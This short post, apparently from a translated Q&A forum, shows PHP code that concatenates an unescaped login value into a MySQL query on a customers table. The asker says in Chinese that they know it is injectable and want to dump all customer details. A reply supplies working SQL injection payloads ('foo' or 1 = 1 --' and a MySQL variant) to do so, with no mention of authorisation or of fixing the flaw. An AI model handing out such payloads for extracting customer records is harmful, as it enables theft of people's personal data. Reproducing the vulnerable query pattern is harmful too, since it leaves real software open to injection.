mysql_select_db($database_db, $db);
query_user = "SELECT * FROM customers WHERE email = '$login'";
user = mysql_query($query_user, $db) or die(mysql_error());
row_user = mysql_fetch_assoc($user);
totalRows_user = mysql_num_rows($user);
我需要一些帮助,我知道这是可以注入的,我需要在数据库中显示所有客户详细信息。请帮忙。
这将起作用:
foo' or 1 = 1 --
或者,因为您正在运行MySQL:
foo' or 1 --